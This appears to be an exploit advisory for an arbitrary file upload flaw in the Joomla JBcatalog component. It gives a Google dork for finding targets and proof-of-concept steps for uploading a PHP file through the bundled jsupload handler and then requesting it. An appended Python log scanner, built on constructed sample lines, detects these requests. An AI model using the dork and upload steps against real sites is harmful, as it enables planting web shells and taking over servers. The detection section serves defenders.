Joomla Component JBcatalog - Arbitrary File Upload

# Exploit Title: Joomla Component JBcatalog - Arbitrary File Upload
# Google Dork: inurl:/components/com_jbcatalog/
# Date: 16 December 2017 (Indonesia)
# Exploit Author: AlHikam0x
# Tested on: Ubuntu

Proof of Concept
1. Check Vulnerability.
https://web-target/[path]/components/com_jbcatalog/libraries/jsupload/server/php/

2. Array type upload: files[]
CSRF Online
3. Check the uploaded file.
https://web-target/com_jbcatalog/libraries/jsupload/server/php/files/file.php
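
For defenders, the requests described above leave a recognizable trail in web server access logs. The following is an added example, not part of the original post: it flags requests to the upload handler path and to script files under its `files/` directory. The combined log format, the extension list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Path of the bundled upload handler, as given in the advisory.
BASE = "com_jbcatalog/libraries/jsupload/server/php/"
# Assumed list of extensions a PHP-enabled server may execute.
SCRIPT_EXT = re.compile(r"\.(?:php\d?|phtml|phar|pht)(?:$|[./])", re.I)
# Assumed log format: Apache/Nginx "combined".
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def classify(line):
    """Return (client_ip, finding, status) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    path = unquote(urlsplit(target).path).lower()
    idx = path.find(BASE)
    if idx < 0:
        return None
    rest = path[idx + len(BASE):]
    if rest.startswith("files/"):
        # A script-like file inside the upload directory should never exist.
        return (ip, "script-in-upload-dir", status) if SCRIPT_EXT.search(rest) else None
    if method == "POST":
        return (ip, "upload-handler-post", status)
    return (ip, "upload-handler-probe", status)

def scan(lines):
    """Classify every log line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (not real traffic).
_P = "/components/com_jbcatalog/libraries/jsupload/server/php/"
_T = '203.0.113.7 - - [16/Dec/2017:10:00:0%d +0700] "%s %s HTTP/1.1" 200 512 "-" "-"'
SAMPLE = [
    _T % (1, "GET", "/joomla" + _P),
    _T % (2, "POST", "/joomla" + _P),
    _T % (3, "GET", "/com_jbcatalog/libraries/jsupload/server/php/files/file.php"),
    _T % (4, "GET", "/joomla" + _P + "files/photo.jpg"),
    _T % (5, "GET", "/index.php"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding)
```

A `script-in-upload-dir` hit with a 200 status means the server answered for a script file in the upload directory, so that host should be reviewed first.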
